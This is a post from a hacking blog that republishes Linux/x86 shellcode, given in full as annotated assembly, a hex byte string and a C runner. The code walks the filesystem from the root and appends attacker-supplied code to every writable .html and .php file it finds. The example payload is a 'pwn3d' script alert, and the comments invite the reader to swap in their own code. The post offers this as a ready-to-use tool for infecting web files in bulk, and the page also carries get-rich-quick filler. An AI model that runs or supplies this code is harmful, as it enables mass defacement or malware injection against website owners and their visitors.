BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Saturday, January 28, 2012

Linux/x86 Search php,html writable files and add your code

0 comments

Code:
; Title : Linux/x86 Search php,html writable files and add your code.
; Date  : 2011-10-24
; Author: rigan - imrigan [sobachka ] gmail.com
; Size  : 380 bytes + your code.
;
; Note  : This shellcode writes down your code in the end of
;         found files. Your code will be added only .html and .php
;         files. Search for files is carried out recursively. 
 
  
 
BITS 32
 
section .text
global _start
_start:
;======================================================================;
;                               main                                   ;
;======================================================================;
              ; chdir("/") 
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2f
                mov ebx, esp
                mov al, 12
                int 0x80
             
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e
                
                jmp SHORT .exit
 
.jmp_search:
                jmp SHORT search     
 
.exit:
                call .jmp_search
          
              ; exit(0)  
                xor eax, eax
                xor ebx, ebx
                mov al, 1
                int 0x80
 
;======================================================================;
;                               inject                                 ;
;======================================================================;
inject:
               ; open("file", O_WRONLY)
                xor eax, eax
                mov ebx, edi
                xor ecx, ecx
                mov cl, 2
                mov al, 5
                int 0x80
                                                
              ; lseek(fd, 0, SEEK_END)
                xor ebx, ebx
                mov ebx, eax
                xor ecx, ecx
                xor eax, eax
                cdq
                mov dl, 2
                mov al, 19
                int 0x80
     
              ; write(fd, your_code, sizeof(your_code)) 
                xor eax, eax
                mov ecx, esi
                mov dl, 43   ; <- TO CHANGE THE SIZE HERE.
                mov al, 4
                int 0x80
 
              ; close(fd)
                xor eax, eax
                xor ebx, ebx
                mov al, 6
                int 0x80
               
                ret
                 
;======================================================================;
;                               substr                                 ;
;======================================================================;
         
substr:      
                xor eax, eax
                xor ebx, ebx
                xor ecx, ecx
                cdq
 
loop_1:
                inc edx
                 
              ; edi contains the filename address
              ; esi contains the substring address
                mov BYTE bl, [edi + edx]
         
                test bl, bl
                jz not_found
                 
                cmp BYTE bl, [esi]       
                jne loop_1       
 
loop_2:       
                mov BYTE al, [esi + ecx]
                mov BYTE bl, [edi + edx]
         
                test al, al
                jz found
         
                inc ecx
         
                inc edx
                cmp bl, al
        
                je loop_2
         
                jmp short not_found
 
found:
                xor eax, eax
                mov al, 2
         
not_found:
                
                ret
                 
;======================================================================;
;                               search                                 ;
;======================================================================;
;This function recursively find all writable files. [php, html]
search:
                push ebp
                mov ebp, esp
                 
                 
                mov al, 250
                sub esp, eax
                
              ; open(".", O_WRONLY)
                xor eax, eax
                xor ecx, ecx
                lea ebx, [ebp + 8]
                mov al, 5
                int 0x80
          
                test eax, eax
                js .old_dirent
       
                mov [ebp + 12], eax   
 
.while:
              ; readdir(fd, struct old_linux_dirent *dirp, NULL)
                mov esi, [ebp + 12]
                mov ebx, esi
                xor eax, eax
                xor ecx, ecx
                lea ecx, [esp + 100]
                mov al, 89
                int 0x80
          
                test eax, eax
                jnz .l1
 
              ; closedir(fd)
                xor eax, eax
                xor ebx, ebx
                mov ebx, esi
                mov al, 6
                int 0x80
 
.old_dirent:        
              ; chdir("..")
                xor eax, eax
                push eax
                push WORD 0x2e2e
                mov ebx, esp
                mov al, 12
                int 0x80
 
                leave
                ret
 
.l1:
                lea edx, [esp + 110]
                 
                cmp DWORD [edx], 0x636f7270   ; If the /proc filesystem detected...
                je .while                     ; ...next dir
          
                cmp BYTE [edx], 0x2e
                jne .l2
                 
                jmp  .while
 
.l2:
              ; lstat(const char *file, struct stat *buf)
                mov ebx, edx
                mov ecx, esp
                xor eax, eax
                mov al, 196
                int 0x80
          
                mov cx, 61439
                mov bx, 40959
                inc ecx  
                inc ebx
                mov eax, [esp + 16]
          
                and ax, cx
          
                cmp ax, bx
                jne .l3
                 
                jmp .while
 
.l3:
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e
          
              ; chdir("file")
                mov ebx, edx
                mov al, 12
                int 0x80
          
                test eax, eax
                jne .l4
          
                call search
                 
                jmp .while
 
.l4:  
              ; access("file", W_OK)      
                xor eax, eax
                mov ebx, edx
                xor ecx, ecx
                mov cl, 2
                mov al, 33
                int 0x80
          
        
                test eax, eax
                jz .check_html
                 
                jmp .while
 
;======================================================================;
;                               check_html                             ;
;======================================================================;
.check_html:
                xor eax, eax
                push eax
                push DWORD 0x6c6d7468   ;
                sub esp, BYTE 0x1       ; .html
                mov BYTE [esp], 0x2e    ; 
                 
                mov esi, esp        
                mov edi, edx        
                call substr
          
                cmp BYTE al, 2
                je .do_inject
 
;======================================================================;
;                               check_php                              ;
;======================================================================;              
.check_php:    
                xor eax, eax
                push eax
                push DWORD 0x7068702e   ; .php
                
                mov esi, esp        
                 
                call substr
                 
                cmp BYTE al, 2
                je .do_inject
                 
                jmp .while
 
;======================================================================;
;                               do_inject                              ;
;======================================================================;
.do_inject:
                jmp SHORT .your_code
                 
.write: 
                pop  esi    ; Get the address of your code into esi
                 
                call inject
                 
                jmp .while
 
;======================================================================; 
;                               your_code                              ;
;======================================================================;
 .your_code:
               call .write
                                                                                               
; Here a place for your code. Its size should be allocated in the
; register dl. Look at the "inject" function.                                                              
                                                                                                
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it.
 
; Dont't forget to change the size of your code!
------------------------------------------------------------------------
                          
              
              Below is presented the shellcode equivalent.
                               
 
#include <stdio.h>
 
char shellcode[] =
                             
    "\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2f\x89\xe3\xb0\x0c\xcd\x80"
    "\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\xeb\x02\xeb\x63\xe8\xf9"
    "\xff\xff\xff\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x31\xc0\x89\xfb\x31"
    "\xc9\xb1\x02\xb0\x05\xcd\x80\x31\xdb\x89\xc3\x31\xc9\x31\xc0\x99"
    "\xb2\x02\xb0\x13\xcd\x80\x31\xc0\x89\xf1\xb2\x2b\xb0\x04\xcd\x80"
    "\x31\xc0\xb0\x06\xcd\x80\xc3\x31\xc0\x31\xdb\x31\xc9\x99\x42\x8a"
    "\x1c\x17\x84\xdb\x74\x1a\x3a\x1e\x75\xf4\x8a\x04\x0e\x8a\x1c\x17"
    "\x84\xc0\x74\x08\x41\x42\x38\xc3\x74\xf0\xeb\x04\x31\xc0\xb0\x02"
    "\xc3\x55\x89\xe5\xb0\xfa\x29\xc4\x31\xc0\x31\xc9\x8d\x5d\x08\xb0"
    "\x05\xcd\x80\x85\xc0\x78\x22\x89\x45\x0c\x8b\x75\x0c\x89\xf3\x31"
    "\xc0\x31\xc9\x8d\x4c\x24\x64\xb0\x59\xcd\x80\x85\xc0\x75\x19\x31"
    "\xc0\x31\xdb\x89\xf3\xb0\x06\xcd\x80\x31\xc0\x50\x66\x68\x2e\x2e"
    "\x89\xe3\xb0\x0c\xcd\x80\xc9\xc3\x8d\x54\x24\x6e\x81\x3a\x70\x72"
    "\x6f\x63\x74\xc6\x80\x3a\x2e\x75\x05\xe9\xbc\xff\xff\xff\x89\xd3"
    "\x89\xe1\x31\xc0\xb0\xc4\xcd\x80\x66\xb9\xff\xef\x66\xbb\xff\x9f"
    "\x41\x43\x8b\x44\x24\x10\x66\x21\xc8\x66\x39\xd8\x75\x05\xe9\x97"
    "\xff\xff\xff\x31\xc0\x50\x83\xec\x01\xc6\x04\x24\x2e\x89\xd3\xb0"
    "\x0c\xcd\x80\x85\xc0\x75\x0a\xe8\x65\xff\xff\xff\xe9\x79\xff\xff"
    "\xff\x31\xc0\x89\xd3\x31\xc9\xb1\x02\xb0\x21\xcd\x80\x85\xc0\x74"
    "\x05\xe9\x64\xff\xff\xff\x31\xc0\x50\x68\x68\x74\x6d\x6c\x83\xec"
    "\x01\xc6\x04\x24\x2e\x89\xe6\x89\xd7\xe8\x09\xff\xff\xff\x3c\x02"
    "\x74\x18\x31\xc0\x50\x68\x2e\x70\x68\x70\x89\xe6\xe8\xf6\xfe\xff"
    "\xff\x3c\x02\x74\x05\xe9\x30\xff\xff\xff\xeb\x0b\x5e\xe8\xb9\xfe"
    "\xff\xff\xe9\x23\xff\xff\xff\xe8\xf0\xff\xff\xff"
    // <html><script>alert("pwn3d")<script></html>
    "\x3c\x68\x74\x6d\x6c\x3e\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c"
    "\x65\x72\x74\x28\x22\x70\x77\x6e\x33\x64\x22\x29\x3c\x73\x63\x72"
    "\x69\x70\x74\x3e\x3c\x2f\x68\x74\x6d\x6c\x3e";
     
int main()
{  
  printf("%d\n", strlen(shellcode));
  (*(void (*)()) shellcode)();
  return 0;
}  


©2011, copyright BLACK BURN

0 comments:

Post a Comment

 

7 Years Earning Experience

The Earning Source You Can Trust